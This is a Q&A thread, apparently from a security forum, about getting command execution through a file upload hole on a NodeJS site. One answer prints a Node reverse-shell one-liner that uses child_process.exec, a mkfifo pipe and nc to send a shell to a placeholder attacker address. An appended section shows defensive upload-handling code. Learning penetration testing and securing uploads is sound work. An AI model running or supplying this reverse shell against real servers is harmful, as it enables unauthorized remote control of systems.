2

I'm trying to learn the NodeJS pentesting process. I have found a remote file upload vulnerability in a NodeJS website. Can I upload a remote shell in NodeJS, like we do in PHP or ASPX, and execute commands? Can I upload a NodeJS shell.js and execute Unix commands on the server from this shell?

Mourad
  • 31
  • 1
  • 2
  • You can upload a shell.js script but you cannot execute it remotely unless you have the SSH password and username of the target – milad May 12 '20 at 10:10

2 Answers

2

Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).

Dykotomee
  • 728
  • 6
  • 20
0

It's possible only if you can "EXECUTE" the file.

But if you can "execute" JavaScript code you could create a reverse shell using this:

(function () {
    // child_process.exec hands the string to a shell on the server
    require("child_process")
        .exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f');
})();

Otherwise, if you can't execute the file, then you will only see the content of the file:

https://myvulnerablewebsite.com/hack.js

daronwolff
  • 1,994
  • 21
  • 18
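
Both answers turn on whether the uploaded file is ever executed rather than just stored and served. As an added example (not code from this thread or from any project), here is one way an upload handler can keep uploads inert; the directory paths, the extension allowlist and the names `planUpload` and `isInside` are assumptions made for illustration.

```javascript
const path = require("path");
const crypto = require("crypto");

const APP_ROOT = "/srv/app";        // assumed: where the application's own code lives
const UPLOAD_ROOT = "/srv/uploads"; // assumed: data-only directory outside APP_ROOT
const ALLOWED_EXT = new Set([".png", ".jpg", ".jpeg", ".pdf"]);

// True when `child` is `parent` itself or lies below it.
function isInside(parent, child) {
  const rel = path.relative(parent, child);
  if (rel === "") return true;
  return rel !== ".." && !rel.startsWith(".." + path.sep) && !path.isAbsolute(rel);
}

// Decide where an upload is stored. The client-supplied name only contributes an
// allowlisted extension; the stored name is random and chosen by the server.
function planUpload(clientName, uploadRoot = UPLOAD_ROOT, appRoot = APP_ROOT) {
  if (isInside(appRoot, uploadRoot)) {
    throw new Error("upload directory must not be inside the application code tree");
  }
  if (typeof clientName !== "string" || clientName.includes("\0")) {
    return { ok: false, reason: "invalid name" };
  }
  const base = path.basename(clientName.replace(/\\/g, "/"));
  const ext = path.extname(base).toLowerCase();
  if (!ALLOWED_EXT.has(ext)) {
    return { ok: false, reason: "extension not allowed" };
  }
  const storedName = crypto.randomBytes(16).toString("hex") + ext;
  const fullPath = path.resolve(uploadRoot, storedName);
  if (!isInside(uploadRoot, fullPath)) {
    return { ok: false, reason: "path escapes upload directory" };
  }
  return {
    ok: true,
    fullPath,
    // Serve the file back as an inert download, never as script or HTML.
    headers: {
      "Content-Disposition": "attachment",
      "X-Content-Type-Options": "nosniff",
    },
  };
}
```

The caller writes the file to `fullPath` and never passes anything under the upload directory to `require()`, `import()` or `child_process`.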